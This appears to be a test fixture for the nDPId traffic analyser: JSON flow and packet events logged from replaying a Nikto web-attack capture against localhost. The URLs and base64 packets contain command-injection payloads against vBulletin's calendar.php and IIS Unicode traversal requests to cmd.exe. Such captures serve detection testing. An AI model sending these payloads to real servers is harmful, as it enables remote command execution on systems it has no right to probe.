-00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_packet_id":1,"flow_last_seen":1576420277855,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":313,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":313,"pkt_l4_len":279,"thread_ts_msec":1576420277855,"pkt":"AAAAAAAAAAAAAAAACABFAAErbT9AAEAGzot\/AAABfwAAAcc6H5Be6VQGyl7\/vYAYAED\/HwAAAQEICp1m\/4edZv+HR0VUIC9mb3J1bXovY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwMzkpDQoNCg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277855,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumz\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7440000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420277857,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_packet_id":1,"flow_last_seen":1576420277857,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1576420277857,"pkt":"AAAAAAAAAAAAAAAACABFAAEsZgtAAEAG1b5\/AAABfwAAAcc8H5AWK18ypPoEwIAYAED\/IAAAAQEICp1m\/4mdZv+JR0VUIC9odGZvcnVtL2NhbGVuZGFyLnBocD9jYWxiaXJ0aGRheXM9MSZhY3Rpb249Z2V0ZGF5JmRheT0yMDAxLTgtMTUmY29tbWE9JTIyO2VjaG8lMjAnJzslMjBlY2hvJTIwJTYwaWQlMjAlNjA7ZGllKCk7ZWNobyUyMiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDM5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7440000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420277857,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htforum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7440000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_packet_id":1,"flow_last_seen":1576420277858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":312,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":312,"pkt_l4_len":278,"thread_ts_msec":1576420277858,"pkt":"AAAAAAAAAAAAAAAACABFAAEqtcxAAEAGhf9\/AAABfwAAAcc+H5DIWozz4BLqQYAYAED\/HgAAAQEICp1m\/4qdZv+KR0VUIC9ib2FyZC9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7440000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/board\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7440000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_packet_id":1,"flow_last_seen":1576420277860,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":316,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":316,"pkt_l4_len":282,"thread_ts_msec":1576420277860,"pkt":"AAAAAAAAAAAAAAAACABFAAEumzdAAEAGoJB\/AAABfwAAAcdAH5B97qINvJ0VaoAYAED\/IgAAAQEICp1m\/4ydZv+MR0VUIC9jb21tdW5pdHkvY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDM5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7440000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/community\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7440000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420277861,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00804{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_packet_id":1,"flow_last_seen":1576420277861,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":309,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":309,"pkt_l4_len":275,"thread_ts_msec":1576420277861,"pkt":"AAAAAAAAAAAAAAAACABFAAEntyFAAEAGhK1\/AAABfwAAAcdCH5DLAI4n0VAE+IAYAED\/GwAAAQEICp1m\/42dZv+NR0VUIC92Yi9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwNDApDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7440000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420277861,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7440000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_packet_id":1,"flow_last_seen":1576420277863,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":316,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":316,"pkt_l4_len":282,"thread_ts_msec":1576420277863,"pkt":"AAAAAAAAAAAAAAAACABFAAEuCCBAAEAGM6h\/AAABfwAAAcdEH5ADaDEo9nQ1BIAYAED\/IgAAAQEICp1m\/4+dZv+PR0VUIC92YnVsbGV0aW4vY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwNDApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7440000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_packet_id":1,"flow_last_seen":1576420277864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277864,"pkt":"AAAAAAAAAAAAAAAACABFAADJt5hAAEAGhJR\/AAABfwAAAcdGH5CwLY6th0R7wIAYAED+vQAAAQEICp1m\/5CdZv+QR0VUIC9fdnRpX2Jpbi9mcGNvdW50LmV4ZSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDg5KQ0KDQo="} -01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/fpcount.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003089)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_packet_id":1,"flow_last_seen":1576420277866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277866,"pkt":"AAAAAAAAAAAAAAAACABFAADHtYVAAEAGhql\/AAABfwAAAcdIH5CyuYy6IN3YVoAYAED+uwAAAQEICp1m\/5KdZv+SR0VUIC9zaXRlL2VnL3NvdXJjZS5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxMjYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site\/eg\/source.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003126)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277867,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_packet_id":1,"flow_last_seen":1576420277867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277867,"pkt":"AAAAAAAAAAAAAAAACABFAADlWiBAAEAG4fB\/AAABfwAAAcdKH5CvgWMmQVkzqIAYAED+2QAAAQEICp1m\/5OdZv+TR0VUIC9jZXJ0c3J2Ly4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277867,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003190)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7440000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_packet_id":1,"flow_last_seen":1576420277870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1576420277870,"pkt":"AAAAAAAAAAAAAAAACABFAADwKqRAAEAGEWJ\/AAABfwAAAcdMH5CrChOaUJIGgIAYAED+5AAAAQEICp1m\/5adZv+WR0VUIC9jZ2ktYmluLy4uJWMwJWFmLi4vLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5MSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01111{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7440000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003191)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 